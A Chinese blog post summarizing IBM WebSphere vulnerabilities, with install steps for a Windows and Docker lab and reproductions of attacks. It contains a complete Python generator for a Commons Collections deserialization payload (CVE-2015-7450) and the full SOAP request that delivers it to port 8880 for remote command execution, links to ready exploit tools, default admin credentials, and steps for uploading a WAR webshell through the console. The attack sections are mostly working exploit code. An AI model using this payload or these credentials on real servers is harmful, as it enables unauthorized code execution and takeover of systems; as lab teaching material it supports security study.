WebSphere中间件漏洞总结

最新推荐文章于 2025-08-20 16:29:17 发布
原创 最新推荐文章于 2025-08-20 16:29:17 发布 · 1.8k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#中间件 #java #数据库

本文总结了WebSphere中间件的漏洞,包括WebSphere反序列化漏洞CVE-2015-7450的原理和利用方式,弱口令及后台Getshell的情况,以及CVE-2020-4450的相关信息。详细介绍了安装过程,特别是通过Windows和Docker的安装步骤,并强调了在复现漏洞时需要注意的细节。

WebSphere中间件漏洞总结

一、WebSphere简介

WebSphere为SOA(面向服务架构)环境提供软件,以实现动态的、互联的业务流程,为所有业务情形提供高度有效的应用程序基础架构。WebSphere是IBM的应用程序和集成软件平台,包含所有必要的中间件基础架构(包括服务器、服务和工具),这些基础架构是创建、部署、运行和持续监视企业级Web应用程序和跨平台、跨产品的解决方案所必需的。与WAS6,WAS7相比较而言WAS8发生了很大的改变,其安装介质和以前截然不同;并且官网已经明确说明:版本1.7.4.7及更早版本已被1.8.x和1.9.x版本取代。所有1.8之前版本的用户应将其系统升级到上述版本之一。

WebSphere Application Server 加速交付新应用程序和服务,它可以通过快速交付创新的应用程序来帮助企业提供丰富的用户体验。从基于开放标准的丰富的编程模型中进行选择,以便更好的协调项目需求与编程模型功能和开发人员技能。

指纹 Server:WebSphere Application Server/7.0
登录页面
http://127.0.0.1:9060/ibm/console/logon.jsp
https://127.0.0.1:9043/ibm/console/logon.jsp

二、WebSphere详细安装(Win)

2.1 下载WebSphere:

下载地址:​
http://www-01.ibm.com/support/docview.wss?uid=swg27004980​
https://www-01.ibm.com/support/docview.wss?uid=swg27025142#ibm-content

在复现一些漏洞,比如 oracle weblogic 、ibm websphere等等时,都需要账号登录。 bugmenot 是03年上线的一个服务,专门提供一些共享账号给大众使用.
地址:http://bugmenot.com/

1、下载的时候需要注册下账号密码注册完后进入,进入之后选择版本:
在这里插入图片描述
2、需要 下载文件 进行连接下载:
在这里插入图片描述
3、需要JDK8的版本支撑
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
注意,一定需要挂载V2(🪜)等才可以下载下载完成后解压
在这里插入图片描述
4、安装WebSphere:双击install.exe
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
5、安装时需要下载东西,计算机要保持联网状态下载WAS:直接去官网搜索
官网地址:http://www.ibm.com/en-us/homepage-a.html
搜索:Websphere Application Server for Developers
在这里插入图片描述
6、下载完成后,解压
在这里插入图片描述
三个压缩文件解压到同一个文件夹内安装WAS:运行IBM
在这里插入图片描述
7、打开首选项
在这里插入图片描述
8、选择添加存储库-浏览,选中之前下载解压的目录下的 .config 文
在这里插入图片描述
9、点击确定,回到首页,选择安装,在安装软件包处打上勾
在这里插入图片描述
10、一直选择默认下一步,然后点击安装
在这里插入图片描述
上图为安装完成添加Server:选择创建
在这里插入图片描述
选择应用程序服务器
在这里插入图片描述
选择高级概要文件创建

在这里插入图片描述
默认下一步
在这里插入图片描述
C:\Program Files (x86)\IBM\WebSphere\AppServer\profiles\AppSrv01
在这里插入图片描述
这里要注意主机名的配置为本机计算机名称(保证能Ping通),在实际生产中配置服务器的IP地址填写用户名密码
在这里插入图片描述
admin / 123456 默认下一步
在这里插入图片描述
注意默认端口信息,但是保存一下,可能会用到 取消勾选
在这里插入图片描述
然后默认下一步知道创建完成 取消勾选,然后完成
在这里插入图片描述
至此成功创建AppSrv01应用服务器
在这里插入图片描述
概要文件配置完成 目录结构如下
在这里插入图片描述
运行WAS:管理员模式运行cmd
cd C:\Program Files (x86)\IBM\WebSphere\AppServer\bin
startServer -help
命令行进入概要文件目录下的bin目录,执行startServer -help 查看该命令对应的帮助(其他命令的用法也可通过同样的操作得到)可能要等一会才会显示
在这里插入图片描述
执行命令启动WAS
startServer server1 -profileName AppSrv01
在这里插入图片描述
表示WAS成功启动 (可通过stopServer+【服务名】命令来停止)

打开浏览器输入
http://127.0.0.1:9060/ibm/console

在这里插入图片描述
在这里插入图片描述
搭建完成

三、WebSphere详细安装(Docker)

3.1 环境通过docker搭建:

一键安装Docker:
curl -s https://get.docker.com/ | sh

安装docker-compose:
pip install docker-compose
安装完成后,执行docker-compose -v,有返回则说明安装成功。

拉取WebSphere运行

docker pull iscrosales/websphere7
docker run -d -p 9060:9060 -p 9043:9043 -p 8880:8880 -p 9080:9080 iscrosales/websphere7

查看容器
在这里插入图片描述

四、漏洞复现

4.1 WebSphere反序列化(CVE-2015-7450)
4.1.1 漏洞原理

Apache Commons Collections (ACC) 3.2.1及4.0版本未能正确验证用户输入,其InvokerTransformer类在反序列化来自可疑域的数据时存在安全漏洞,这可使攻击者在用户输入中附加恶意代码并组合运用不同类的readObject()方法,在最终类型检查之前执行Java函数或字节码(包括调用Runtime.exec()执行本地OS命令)。

漏洞探测:

该反序列化漏洞发生位置在SOAP的通信端口8880,使用https发送XML格式数据。如果访问8880端口出现如下界面,则可能存在Java反序列化漏洞:
在这里插入图片描述

将构造的执行命令的payload通过base64编码后放在objectname节点中,通过https发送到服务器端,服务器端调用相应的执行函数,将结果发送给客户端,同样返回的数据也是经过base64编码的。

import base64
from binascii import unhexlify
 
command = "执行的命令"
serObj = unhexlify("ACED00057372003273756E2E7265666C6563742E616E6E6F746174696F6E2E416E6E6F746174696F6E496E766F636174696F6E48616E646C657255CAF50F15CB7EA50200024C000C6D656D62657256616C75657374000F4C6A6176612F7574696C2F4D61703B4C0004747970657400114C6A6176612F6C616E672F436C6173733B7870737D00000001000D6A6176612E7574696C2E4D6170787200176A6176612E6C616E672E7265666C6563742E50726F7879E127DA20CC1043CB0200014C0001687400254C6A6176612F6C616E672F7265666C6563742F496E766F636174696F6E48616E646C65723B78707371007E00007372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E747400124C6A6176612F6C616E672F4F626A6563743B7870767200116A6176612E6C616E672E52756E74696D65000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000274000A67657452756E74696D65757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007400096765744D6574686F647571007E001E00000002767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707671007E001E7371007E00167571007E001B00000002707571007E001B00000000740006696E766F6B657571007E001E00000002767200106A6176612E6C616E672E4F626A656374000000000000000000000078707671007E001B7371007E0016757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017400")
serObj += (chr(len(command)) + command).encode('ascii')
serObj += unhexlify("740004657865637571007E001E0000000171007E00237371007E0011737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F40000000000010770800000010000000007878767200126A6176612E6C616E672E4F766572726964650000000000000000000000787071007E003A")
serObjB64 = base64.b64encode(serObj).decode()
print(serObjB64)

然后将输出的serObjB64,替换到如下数据包中的params节点,发送数据包即可执行

POST / HTTP/1.1
Host: 192.168.31.12:8880
User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml
SOAPAction: urn:AdminService
Content-Length: 8886
 
<?xml version='1.0' encoding='UTF-8'?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SOAP-ENV:Header ns0:JMXConnectorContext="rO0ABXNyAA9qYXZhLnV0aWwuU3RhY2sQ/irCuwmGHQIAAHhyABBqYXZhLnV0aWwuVmVjdG9y2Zd9W4A7rwEDAANJABFjYXBhY2l0eUluY3JlbWVudEkADGVsZW1lbnRDb3VudFsAC2VsZW1lbnREYXRhdAATW0xqYXZhL2xhbmcvT2JqZWN0O3hwAAAAAAAAAAF1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAAKc3IAOmNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3IuSk1YQ29ubmVjdG9yQ29udGV4dEVsZW1lbnTblRMyYyF8sQIABUwACGNlbGxOYW1ldAASTGphdmEvbGFuZy9TdHJpbmc7TAAIaG9zdE5hbWVxAH4AB0wACG5vZGVOYW1lcQB+AAdMAApzZXJ2ZXJOYW1lcQB+AAdbAApzdGFja1RyYWNldAAeW0xqYXZhL2xhbmcvU3RhY2tUcmFjZUVsZW1lbnQ7eHB0AAB0AAhMYXAzOTAxM3EAfgAKcQB+AAp1cgAeW0xqYXZhLmxhbmcuU3RhY2tUcmFjZUVsZW1lbnQ7AkYqPDz9IjkCAAB4cAAAACpzcgAbamF2YS5sYW5nLlN0YWNrVHJhY2VFbGVtZW50YQnFmiY23YUCAARJAApsaW5lTnVtYmVyTAAOZGVjbGFyaW5nQ2xhc3NxAH4AB0wACGZpbGVOYW1lcQB+AAdMAAptZXRob2ROYW1lcQB+AAd4cAAAAEt0ADpjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLkpNWENvbm5lY3RvckNvbnRleHRFbGVtZW50dAAfSk1YQ29ubmVjdG9yQ29udGV4dEVsZW1lbnQuamF2YXQABjxpbml0PnNxAH4ADgAAADx0ADNjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLkpNWENvbm5lY3RvckNvbnRleHR0ABhKTVhDb25uZWN0b3JDb250ZXh0LmphdmF0AARwdXNoc3EAfgAOAAAGQ3QAOGNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3Iuc29hcC5TT0FQQ29ubmVjdG9yQ2xpZW50dAAYU09BUENvbm5lY3RvckNsaWVudC5qYXZhdAAcZ2V0Sk1YQ29ubmVjdG9yQ29udGV4dEhlYWRlcnNxAH4ADgAAA0h0ADhjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLnNvYXAuU09BUENvbm5lY3RvckNsaWVudHQAGFNPQVBDb25uZWN0b3JDbGllbnQuamF2YXQAEmludm9rZVRlbXBsYXRlT25jZXNxAH4ADgAAArF0ADhjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLnNvYXAuU09BUENvbm5lY3RvckNsaWVudHQAGFNPQVBDb25uZWN0b3JDbGllbnQuamF2YXQADmludm9rZVRlbXBsYXRlc3EAfgAOAAACp3QAOGNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3Iuc29hcC5TT0FQQ29ubmVjdG9yQ2xpZW50dAAYU09BUENvbm5lY3RvckNsaWVudC5qYXZhdAAOaW52b2tlVGVtcGxhdGVzcQB+AA4AAAKZdAA4Y29tLmlibS53cy5tYW5hZ2VtZW50LmNvbm5lY3Rvci5zb2FwLlNPQVBDb25uZWN0b3JDbGllbnR0ABhTT0FQQ29ubmVjdG9yQ2xpZW50LmphdmF0AAZpbnZva2VzcQB+AA4AAAHndAA4Y29tLmlibS53cy5tYW5hZ2VtZW50LmNvbm5lY3Rvci5zb2FwLlNPQVBDb25uZWN0b3JDbGllbnR0ABhTT0FQQ29ubmVjdG9yQ2xpZW50LmphdmF0AAZpbnZva2VzcQB+AA7/dAAVY29tLnN1bi5wcm94eS4kUHJveHkwcHQABmludm9rZXNxAH4ADgAAAOB0ACVjb20uaWJtLndzLm1hbmFnZW1lbnQuQWRtaW5DbGllbnRJbXBsdAAUQWRtaW5DbGllbnRJbXBsLmphdmF0AAZpbnZva2VzcQB+AA4AAADYdAA9Y29tLmlibS53ZWJzcGhlcmUubWFuYWdlbWVudC5jb25maWdzZXJ2aWNlLkNvbmZpZ1NlcnZpY2VQcm94eXQAF0NvbmZpZ1NlcnZpY2VQcm94eS5qYXZhdAARZ2V0VW5zYXZlZENoYW5nZXNzcQB+AA4AAAwYdAAmY29tLmlibS53cy5zY3JpcHRpbmcuQWRtaW5Db25maWdDbGllbnR0ABZBZG1pbkNvbmZpZ0NsaWVudC5qYXZhdAAKaGFzQ2hhbmdlc3NxAH4ADgAAA/Z0AB5jb20uaWJtLndzLnNjcmlwdGluZy5XYXN4U2hlbGx0AA5XYXN4U2hlbGwuamF2YXQACHRpbWVUb0dvc3EAfgAOAAAFm3QAImNvbS5pYm0ud3Muc2NyaXB0aW5nLkFic3RyYWN0U2hlbGx0ABJBYnN0cmFjdFNoZWxsLmphdmF0AAtpbnRlcmFjdGl2ZXNxAH4ADgAACPp0ACJjb20uaWJtLndzLnNjcmlwdGluZy5BYnN0cmFjdFNoZWxsdAASQWJzdHJhY3RTaGVsbC5qYXZhdAADcnVuc3EAfgAOAAAElHQAHmNvbS5pYm0ud3Muc2NyaXB0aW5nLldhc3hTaGVsbHQADldhc3hTaGVsbC5qYXZhdAAEbWFpbnNxAH4ADv50ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQAB2ludm9rZTBzcQB+AA4AAAA8dAAkc3VuLnJlZmxlY3QuTmF0aXZlTWV0aG9kQWNjZXNzb3JJbXBsdAAdTmF0aXZlTWV0aG9kQWNjZXNzb3JJbXBsLmphdmF0AAZpbnZva2VzcQB+AA4AAAAldAAoc3VuLnJlZmxlY3QuRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbHQAIURlbGVnYXRpbmdNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAAmN0ABhqYXZhLmxhbmcucmVmbGVjdC5NZXRob2R0AAtNZXRob2QuamF2YXQABmludm9rZXNxAH4ADgAAAOp0ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAAKbGF1bmNoTWFpbnNxAH4ADgAAAGB0ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAAEbWFpbnNxAH4ADgAAAE10ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAADcnVuc3EAfgAO/nQAJHN1bi5yZWZsZWN0Lk5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbHQAHU5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAHaW52b2tlMHNxAH4ADgAAADx0ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAACV0AChzdW4ucmVmbGVjdC5EZWxlZ2F0aW5nTWV0aG9kQWNjZXNzb3JJbXBsdAAhRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAGaW52b2tlc3EAfgAOAAACY3QAGGphdmEubGFuZy5yZWZsZWN0Lk1ldGhvZHQAC01ldGhvZC5qYXZhdAAGaW52b2tlc3EAfgAOAAACS3QANG9yZy5lY2xpcHNlLmVxdWlub3guaW50ZXJuYWwuYXBwLkVjbGlwc2VBcHBDb250YWluZXJ0ABhFY2xpcHNlQXBwQ29udGFpbmVyLmphdmF0ABdjYWxsTWV0aG9kV2l0aEV4Y2VwdGlvbnNxAH4ADgAAAMZ0ADFvcmcuZWNsaXBzZS5lcXVpbm94LmludGVybmFsLmFwcC5FY2xpcHNlQXBwSGFuZGxldAAVRWNsaXBzZUFwcEhhbmRsZS5qYXZhdAADcnVuc3EAfgAOAAAAbnQAPG9yZy5lY2xpcHNlLmNvcmUucnVudGltZS5pbnRlcm5hbC5hZGFwdG9yLkVjbGlwc2VBcHBMYXVuY2hlcnQAF0VjbGlwc2VBcHBMYXVuY2hlci5qYXZhdAAOcnVuQXBwbGljYXRpb25zcQB+AA4AAABPdAA8b3JnLmVjbGlwc2UuY29yZS5ydW50aW1lLmludGVybmFsLmFkYXB0b3IuRWNsaXBzZUFwcExhdW5jaGVydAAXRWNsaXBzZUFwcExhdW5jaGVyLmphdmF0AAVzdGFydHNxAH4ADgAAAXF0AC9vcmcuZWNsaXBzZS5jb3JlLnJ1bnRpbWUuYWRhcHRvci5FY2xpcHNlU3RhcnRlcnQAE0VjbGlwc2VTdGFydGVyLmphdmF0AANydW5zcQB+AA4AAACzdAAvb3JnLmVjbGlwc2UuY29yZS5ydW50aW1lLmFkYXB0b3IuRWNsaXBzZVN0YXJ0ZXJ0ABNFY2xpcHNlU3RhcnRlci5qYXZhdAADcnVuc3EAfgAO/nQAJHN1bi5yZWZsZWN0Lk5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbHQAHU5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAHaW52b2tlMHNxAH4ADgAAADx0ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAACV0AChzdW4ucmVmbGVjdC5EZWxlZ2F0aW5nTWV0aG9kQWNjZXNzb3JJbXBsdAAhRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAGaW52b2tlc3EAfgAOAAACY3QAGGphdmEubGFuZy5yZWZsZWN0Lk1ldGhvZHQAC01ldGhvZC5qYXZhdAAGaW52b2tlc3EAfgAOAAABVHQAHm9yZy5lY2xpcHNlLmNvcmUubGF1bmNoZXIuTWFpbnQACU1haW4uamF2YXQAD2ludm9rZUZyYW1ld29ya3NxAH4ADgAAARp0AB5vcmcuZWNsaXBzZS5jb3JlLmxhdW5jaGVyLk1haW50AAlNYWluLmphdmF0AAhiYXNpY1J1bnNxAH4ADgAAA9V0AB5vcmcuZWNsaXBzZS5jb3JlLmxhdW5jaGVyLk1haW50AAlNYWluLmphdmF0AANydW5zcQB+AA4AAAGQdAAlY29tLmlibS53c3NwaS5ib290c3RyYXAuV1NQcmVMYXVuY2hlcnQAEldTUHJlTGF1bmNoZXIuamF2YXQADWxhdW5jaEVjbGlwc2VzcQB+AA4AAACjdAAlY29tLmlibS53c3NwaS5ib290c3RyYXAuV1NQcmVMYXVuY2hlcnQAEldTUHJlTGF1bmNoZXIuamF2YXQABG1haW5wcHBwcHBwcHB4" xmlns:ns0="admin" ns0:WASRemoteRuntimeVersion="8.5.5.7" ns0:JMXMessageVersion="1.2.0" ns0:JMXVersion="1.2.0">
</SOAP-ENV:Header>
<SOAP-ENV:Body>
<ns1:invoke xmlns:ns1="urn:AdminService" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<objectname xsi:type="ns1:javax.management.ObjectName">rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==</objectname>
<operationname xsi:type="xsd:string">getUnsavedChanges</operationname>
<params xsi:type="ns1:[Ljava.lang.Object;">{serObjB64}</params>
<signature xsi:type="ns1:[Ljava.lang.String;">rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24=</signature>
</ns1:invoke>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
4.1.2 利用python脚本验证该漏洞

https://github.com/Coalfire-Research/java-deserialization-exploits/tree/master/WebSphere/websphere_rce.py
也可以使用DeserializeExploit.jar该工具进行验证:https://cdn.vulhub.org/deserialization/DeserializeExploit.jar
在这里插入图片描述

4.2 WebSphere弱口令&&后台Getshell
4.2.1 漏洞原理

1.在6.x至7.0版本,后台登陆只需要输入admin作为用户标识,无需密码,即可登陆后台。
websphere/ websphere
system/ manager

4.2.2 影响范围

全版本后台登录账号弱口令

4.2.3 漏洞复现

1.点击WebSphere 企业应用程序,点击安装。
在这里插入图片描述
2.上传war包,点击下一步。
在这里插入图片描述
3.一直点击下一步,直到下图,填写上下文根,关系到你访问的URL,接着一直点下一步直到安装完成。
在这里插入图片描述
4.安装完成之后,点击保存主配置,然后回到WebSphere 企业应用程序,选中war包启动,访问shell。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

4.3 CVE-2020-4450

https://www.freebuf.com/vuls/246928.html

IBM WebSphere Application Server Liberty 安全漏洞(CVE-2022-22475)
murphysec的博客
05-17 1240
CVE-2022-22475 漏洞是 IBM WebSphere Application Server Liberty 在启用 appSecurity-1.0、appSecurity-2.0、appSecurity-3.0 或 appSecurity-4.0 功能部件时,易受到攻击者的身份欺骗。该漏洞影响范围小,对于受影响版本建议,升级到最低修订包级别, 参考链接为: https://www.ibm.com/support/pages/node/6586668 编号      CVE-2022-22
WebSphere概述
龙塘湾
02-11 826
来自 Rational Edge:这篇文章是对IBM的最广泛最强大的软件产品家族的一个简单的、高层次的概览。本文针对的是非技术类的以及对WebSphere的功能不熟悉的读者,这篇文章将有助于开发者向他们的经理解释这一技术的目的和好处。 IBM最初的设计目标是建立下一代网络环境的一站式环境,到现在IBM WebSphere已经发展到能够满足现在各组织所面临的各种不同的应用需求,包括增加运行...
WebSphere企业级服务器部署与图解指南
最新发布
weixin_33431149的博客
08-20 438
WebSphere是IBM公司推出的企业级应用服务器(EAS),作为电子商务平台的一部分,它在1990年代末到2000年代初,处于市场领先地位。它的历史地位体现在对于企业应用服务器市场的深远影响,推动了整个行业对于企业级应用支持能力的演进。图解工具是辅助部署过程的重要组成部分,它们通过可视化的方式提供步骤说明,帮助管理员更快地理解配置和部署过程。常用的图解工具包括流程图、序列图、状态机等。
WebSphere系统安全加固规范 中文
09-22
1.账号管理、认证授权 2.日志配置 3.通信协议 4.设备其他安全要求 附录:系统开放端口及对应服务说明
深入浅出带你学习WebSphere中间件漏洞/深入浅出带你学习WebSphere中间件漏洞_0基础白客笔记
程序员三九的博客
05-17 689
本文正在参加「金石计划 . 瓜分6万现金大奖」前言上一篇文章给大家介绍了中间件的一些常见漏洞以及利用方法,今天我给大家带来的是中间件的常见漏洞以及这些漏洞的利用方法
深入浅出带你学习WebSphere中间件漏洞
发果叁
02-16 2134
今天总结了一下WebSphere中间件的常见漏洞,也是作为中间件漏洞介绍的最后一篇文章,回看这几篇文章,会思考的小伙伴已经可以发现不同中间件漏洞总会有相似的地方,这需要我们多多总结,有兴趣的小伙伴不妨自己搭建靶机试一下,喜欢本文希望可以一键三连。最近找到一个VUE的文档,它将VUE的各个知识点进行了总结,整理成了《Vue 开发必须知道的36个技巧》。内容比较详实,对各个知识点的讲解也十分到位。
常见中间件漏洞总结PPT
01-25
对于大项目或商业项目,可以考虑使用WebLogic或WebSphere。对于示例项目或小型项目,也可以采用Jetty作为轻量级的选择。在Linux系统中,建议使用Jetty或Apache HTTPD。对于多平台或操作系统环境下的应用开发,中间件...
网络安全——挖掘漏洞中间件漏洞
weixin_71208450的博客
07-13 1342
学习网络安全的同学肯定了解过漏洞挖掘,漏洞挖掘通常指的是在软件、系统、网络或任何其他类型的技术系统中寻找安全漏洞的过程。这些漏洞可能允许未经授权的访问、数据泄露、服务中断或其他形式的安全威胁。漏洞挖掘是一个网络安全专业领域。作为初学者,学习了知识不等于能力,丰富的项目实战能力才意味着完全掌握。已经入行的大佬们应该都已经了解的相关的漏洞挖掘平台,比如SRC漏洞挖掘。
中间件漏洞详解:Tomcat、Weblogic、Nginx、JBOSS安全总结
“常见中间件漏洞总结PPT,涵盖了包括Tomcat、Weblogic、Nginx、IIS、Jboss在内的多种中间件的常见安全漏洞和相关知识,适合培训和学习。” 在IT行业中,中间件扮演着至关重要的角色,它是一种介于操作系统和应用...
中间件IBM WebSphere Portal
Gao068465的博客
04-09 1559
温故: 上一篇文章和大家分享了什么是网络的“蜜罐”,不知道大家还记不记得?我在这里再大概说一次,毕竟可能有些新朋友没有看到过。蜜罐嘛其实就是一直诱饵。它的作用就是特意设置一些可控的系统漏洞用以吸引攻击者对其进行攻击,通过收集对方的攻击方式、攻击强度等数据进而为系统进行针对性的加固工作。当然了它还有另一个作用就是管理员特意将这个“蜜罐”做的极其坚固,将它放在运行着业务的真正的服务器的前面,由它来承受攻击,当它被攻击的时候管理员就会收到信息以便提前对真正运行服务的系统进行安全加固,这便是蜜罐的强大之处。 关
等保2.0测评 — WebSphere 中间件
2401_84434570的博客
10-12 1257
查看版本登录websphere管理平台首页就能看到版本信息可以进入\usr\IBM\WebSphere\AppServer\bin 下执行./versionInfo.sh查看版本正常情况下,访问web界面需要用户名+口令:webphere控制台可以通过修改配置文件做到无账号密码直接进入控制台操作。需要找到websphere安全验证配置文件。该文件在webphere安装目录里,我们的目录,里面的文件:在该文件的第二行里面的查找到修改为。
IBM WebSphere源代码暴露漏洞
01-20
bugtraq id 1500 class Access Validation Error cve GENERIC-MAP-NOMATCH remote Yes local Yes published July 24, 2000 updated July 24, 2000 vulnerable IBM Websphere Application Server 3.0.21– Sun Solaris 8.0– Microsoft Windows NT 4.0– Linux kernel 2.3.x– IBM AIX 4.3IBM Websphere Application Server 3.0–
jboss、weblogic、websphere等序列化漏洞检测.rar
10-19
该工具可以检测jboss、weblogic、websphere等序列化漏洞,除此之外还能一键上传木马、命令执行、文件管理以及系统的信息。可以说是做安全测试的必备工具
WebSphere漏洞总结复现
热门推荐
1ance's blog
11-14 1万+
写在前面:本文为漏洞复现系列WebSphere篇,复现的漏洞已vulhub中存在的环境为主。 欢迎大家点赞收藏,点点关注更好了hhhhhh 文章目录简介WebSphere反序列化(CVE-2015-7450)漏洞原理影响范围漏洞复现修复建议弱口令 && 后台Getshell漏洞原理影响范围漏洞复现修复建议CVE-2020-4450总结 简介 WebSphere® Application Server 加速交付新应用程序和服务,它可以通过快速交付创新的应用程序来帮助企业提供丰富的用户体验从基
CVE-2025-36038:IBM WebSphere应用服务器曝高危远程代码执行漏洞
FreeBuf_的博客
06-30 556
IBM WebSphere曝高危RCE漏洞,攻击者可远程执行任意代码。
[应用漏洞]WebSphere 后台弱口令Getshell
不忘初心,护天下安全!
08-03 3182
简介 Websphere现在主流的版本是6-7-8。GetShell方法大致差不多。 6.x至7.0版本都有“默认用户标识admin登录” 默认的管理后台地址: https://localhost:9043/ibm/console/logon.jsphttp://localhost:9060/ibm/console/logon.jsp 默认管理密码: system/ managerwebsphere/ websphere ​​​​​​​默认端口:​​​​​​​ 管理控制台端口 9060管
漏洞通告】WebSphere Application Server权限提升漏洞(CVE-2020-4362)通告
爱国小白帽
04-14 2221
漏洞通告】WebSphere Application Server权限提升漏洞(CVE-2020-4362)通告 原创 威胁对抗能力部 [绿盟科技安全情报](javascript:void(0)???? 今天 通告编号:NS-2020-0025 2020-04-14 TA****G: WebSphere、权限提升、CVE-2020-4362 漏****洞危害: 攻击者利用此漏洞,可实现...
中间件安全-CVE漏洞复现-Docker+Websphere+Jetty
xiaoheizi的博客
07-15 759
如果拿下的shell是docker容器的,就要进行docker逃逸来获取宿主机shell,因为在docker容器执行命令影响不到宿主机。Docker容器是使用沙盒机制,是单独的系统,理论上是很安全的,通过利用某种手段,再结合执行POC或EXP,就可以返回一个宿主机的高权限Shell,并拿到宿主机的root权限,可以直接操作宿主机文件。信息泄露路径:http://目标ip:端口/%u002e/WEB-INF/web.xml。信息泄露路径:http://目标ip:端口/%2e/WEB-INF/web.xml。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
